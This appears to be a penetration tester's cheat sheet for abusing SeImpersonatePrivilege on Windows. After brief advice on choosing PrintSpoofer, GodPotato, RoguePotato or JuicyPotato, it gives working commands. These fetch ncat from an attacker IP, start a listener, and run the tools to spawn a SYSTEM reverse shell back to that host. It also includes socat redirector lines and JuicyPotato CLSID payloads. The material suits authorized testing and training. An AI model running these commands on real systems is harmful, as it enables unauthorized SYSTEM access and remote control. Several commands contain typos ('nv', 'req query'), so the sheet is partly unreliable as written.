SeImpersonatePrivilege Exploit

• Check Your Privileges: First and foremost, verify that your current user context has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

• Is the Print Spooler Running? Use sc query spooler to check the status of the Print Spooler service. If it's running, PrintSpoofer is often your most direct route to SYSTEM.

• Assess the Windows Version:

  • Modern & Patched (Windows 10/11, Server 2019/2022):

    • Start with God Potato or its variants. Its reliance on a different vulnerability makes it highly effective.

    • If that fails, try Rogue Potato, which is specifically designed for these newer operating systems.

    • Juicy Potato NG / Sweet Potato are also strong contenders here, as they are designed for modern systems.

  • Older Systems (Windows 7, 8, 10 pre-1809, Server 2008-2016):

    • Juicy Potato is a solid and reliable choice. Its flexibility with CLSIDs makes it a favorite.

    • If for some reason Juicy Potato doesn't work, you can fall back to the original Rotten Potato.

• Consider the Environment: In some highly restricted environments, outbound DCOM traffic might be blocked, or certain services may be disabled. If one Potato fails, don't hesitate to try another, as they leverage different communication channels and services.

whoami /priv

nv -lnvp 1337

\#DOWNLOAD NCAT FROM ATTACKER 
\#32bit
iwr -uri "http://10.10.10.1:8888/nc.exe" -Outfile ncat.exe
\#64bit
iwr -uri "http://10.10.10.1:8888/nc64.exe" -Outfile ncat.exe

----------------------------------------------------------------

\#PRINT SPOOFER
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe" -OutFile PrintSpoofer.exe
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exe

.\PrintSpoofer.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"

----------------------------------------------------------------
\#Get .Net Version
req query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP"

\#GODPOTATO-NET
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -OutFile GodPotato.exe
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -OutFile GodPotato.exe
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -OutFile GodPotato.exe

.\GodPotato.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"


#ROQUE POTATO
https://github.com/antonioCoco/RoguePotato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. 
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode




#JUICY POTATO
https://github.com/ohpe/juicy-potato
https://github.com/mishmashclone/swisskyrepo-PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges
JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
    Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337





#ROTTEN POTATO
https://github.com/breenmachine/RottenPotatoNG